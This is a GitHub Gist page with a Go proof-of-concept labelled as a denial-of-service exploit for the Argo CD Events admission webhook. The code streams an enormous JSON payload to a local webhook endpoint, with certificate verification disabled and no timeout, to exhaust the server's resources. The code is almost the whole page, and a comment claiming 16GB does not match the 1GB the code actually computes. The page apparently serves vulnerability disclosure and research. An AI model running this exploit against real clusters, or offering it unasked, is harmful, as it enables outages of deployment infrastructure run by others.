-
-
Save jake-ciolek/9c86868cf71423a6b4cb6ff592181f51 to your computer and use it in GitHub Desktop.
Argo CD Events Admission Webhook DoS PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"crypto/tls" | |
"io" | |
"net/http" | |
) | |
// Define a custom io.Reader that generates a large dummy JSON payload. | |
type DummyJSONReader struct { | |
size int64 // Total size to generate | |
read int64 // Bytes already generated | |
} | |
// Read generates the next chunk of the dummy JSON payload. | |
func (r *DummyJSONReader) Read(p []byte) (n int, err error) { | |
if r.read >= r.size { | |
return 0, io.EOF // Finished generating | |
} | |
start := false | |
if r.read == 0 { | |
// Start of JSON | |
p[0] = '{' | |
p[1] = '"' | |
p[2] = 'd' | |
p[3] = 'a' | |
p[4] = 't' | |
p[5] = 'a' | |
p[6] = '"' | |
p[7] = ':' | |
p[8] = '"' | |
n = 9 | |
start = true | |
} | |
for i := n; i < len(p); i++ { | |
if r.read+int64(i)-int64(n)+1 == r.size-1 { | |
// End of JSON | |
p[i] = '"' | |
p[i+1] = '}' | |
r.read += int64(i) + 2 - int64(n) | |
return i + 2 - n, nil | |
} else { | |
p[i] = 'x' // Dummy data | |
} | |
} | |
r.read += int64(len(p)) - int64(n) | |
if start { | |
return len(p), nil | |
} | |
return len(p) - n, nil | |
} | |
func main() { | |
// Initialize the custom reader with the desired size (16GB in this case). | |
payloadSize := int64(1) * 1024 * 1024 * 1024 // 16GB | |
reader := &DummyJSONReader{size: payloadSize} | |
// HTTP client setup | |
httpClient := &http.Client{ | |
Timeout: 0, // No timeout | |
Transport: &http.Transport{ | |
TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, | |
}, | |
} | |
req, err := http.NewRequest("POST", "https://localhost:6443/", reader) | |
if err != nil { | |
panic(err) | |
} | |
// Set headers | |
req.Header.Set("Content-Type", "application/json") | |
resp, err := httpClient.Do(req) | |
if err != nil { | |
panic(err) | |
} | |
defer resp.Body.Close() | |
println("Response status code:", resp.StatusCode) | |
// Read the response body with io.ReadAll | |
body, err := io.ReadAll(resp.Body) | |
if err != nil { | |
panic(err) | |
} | |
// Convert the body to string and print | |
println("Response body:", string(body)) | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment